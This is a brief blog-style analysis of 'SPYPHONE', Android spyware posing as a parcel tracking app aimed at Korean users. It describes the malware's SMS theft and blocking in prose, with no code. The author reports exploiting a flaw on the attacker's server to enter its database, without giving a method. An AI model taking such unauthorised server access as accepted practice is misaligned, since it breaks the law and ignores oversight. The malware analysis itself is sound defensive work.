SPYPHONE : Spyware targeted korean Android users

Hello, everyone !

Today, I have analyzed a malware which mimics a parcel tracking system.
If an android user was infected it, All SMS messages will be transmitted to the server that the attacker owns. In addition, an attacker can block SMS from being exposed to the user if necessary.

Block SMS messages.

Send infected user information to the server.

Interesting facts is that I have found a vulnerability on the server. The vulnerability was in the code that sent stolen SMS messages to the server.

In the followed screen shot, shows how the malware send stolen SMS messages to the server.
스크린샷 2017-11-02 오후 10.18.51.png

After a successful attack on the vulnerability, I was able to access to the database. In the database, There were two difference DBs which was named spyphone & xiaozhen. So I decided the name of the malware with SPYPHONE.

스크린샷 2017-11-02 오후 10.48.15.png

VirusTotal Result
https://www.virustotal.com/#/file-analysis/NTE3ZWY1ZTFhMDg0YjJmZjlkMTFkMDE2OWE4ZjA4M2Q6MTUwOTYyODU3Ng==